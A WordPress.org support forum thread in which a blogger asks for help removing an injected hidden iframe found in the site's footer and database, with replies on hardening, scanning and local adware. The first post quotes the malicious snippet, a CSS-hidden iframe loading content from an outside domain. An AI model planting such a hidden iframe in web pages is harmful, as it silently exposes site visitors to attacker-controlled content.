WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Iframe Virus/Malware Detection In WordPress Footer (9 posts)

  1. noouman
    Member
    Posted 2 years ago #

    Hi Everyone,

    I have been using wordpress since long time and have started a blog http://www.allabthair.com which is recently infected with a virus/malware that something look like this:

    <style type="text/css">#yavvw {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="yavvw" src="http://3i17cu.estateplanningservices.co.za/ad.jpg?11"></iframe>

    When i check my site through http://web-sniffer.net/ and http://unmaskparasites.com/ and both of these sites show that iframe is added at the end of the script of my website. I looked everyone for this code in wordpress installation files, uploads, contents but i am still unable to find this information in the wordpress. When i gone through my Sql database by downloading sql file in the local machine i am able to find it there. But i am non techie so i dont know where to find and remove this in the installation files as all seems as clean so can anyone help me to finding and removing this script. I tried to make a fresh installation of my wordpress but i think my database is infection so when i re-install wordpress this infection comes back automatically.

    I am really frustrated with removing this infection. Can someone help me in cleaning my database through PHPMYADMIN or anyother way which i can do myself?

    Help me on remove Iframe Virus/Malware Infection.

    I shall be very thankful to you.

  2. kevin2i
    Member
    Posted 1 year ago #

    Check each and every index.php in all of your themes, in addition to the index.php in your wordpress root directory.

    Make sure you tighten up permissions.
    http://codex.wordpress.org/Hardening_WordPress

  3. Crandlemire
    Member
    Posted 1 year ago #

    This just happened to me last week -- ads started showing up on different WordPress site that I manage. I thought it was the hosting company -- that we had been hacked -- but it turned out to be a malware / virus / trojen / whatever has gotten into my system and now I am beginning to see ads appearing on other websites -- when there shouldn't be any ads.

    I still haven't been able to remove it yet from my system.

    The ads are being injected in the browser with javascript and an iframe.

  4. Rachel Baker
    Member
    Posted 1 year ago #

    You should probably go through the steps described here: http://codex.wordpress.org/FAQ_My_site_was_hacked

  5. Crandlemire
    Member
    Posted 1 year ago #

    Hi Rachelbaker,

    I guess you didn't fully read my post -- the websites were not hacked but a malware or whatever is in my computer and it injects the Google ads into various website.

    Again my website was not hacked and I believe that is the same problem Noouman was posting about 10 months ago.

    I just wanted other users to be aware that is a possibility if they are seeing the samw things I am -- Ads on your WordPress site -- down under the footer and it is in an iframe. You can see it in the source code when viewing the page -- but it doesn't exist in the WordPress site.

  6. Rachel Baker
    Member
    Posted 1 year ago #

    Crandlemire,

    I understood your post. However if your local machine is infected with malware you can be passing an infection to your WordPress website.

    The second item on the FAQ My Site was hacked article is:

    Scan your local machine.
    Sometimes the malware was introduced through a compromised desktop system. Make sure you run a full anti-virus/malware scan on your local machine. Some viruses are good at detecting AV software and hiding from them. So maybe try a different one. This advice generally only applies to Windows systems.

  7. Crandlemire
    Member
    Posted 1 year ago #

    Except, as I made it clear, that the malware was not passed on to the website. Whatever it is I have, ONLY exist on the local machine and it places it on different websites (not all of them) in an iframe.

    Your post, while insightful, didn't really address the issues here at hand -- nor with the original person's post.

    If you have some definet answers to the problem at hand it would be much appreciated -- I and others really need it.

    Thanks.

  8. esmi
    Forum Moderator
    Posted 1 year ago #

    If this problem is with your local machine only, then it's not a WordPress issue at all. Try posting on a dedicated AV or malware forum.

  9. Crandlemire
    Member
    Posted 1 year ago #

    Yes, I was just trying to answer the original post from noouman -- which I found while doing a Google search to my own problem.

    I know you are a forum moderator esmi, but anyone else that wants to comment on what I have written please read the entire thread to these post so we are not merely answering a piece of it.

    Thanks.

Topic Closed

This topic has been closed to new replies.

About this Topic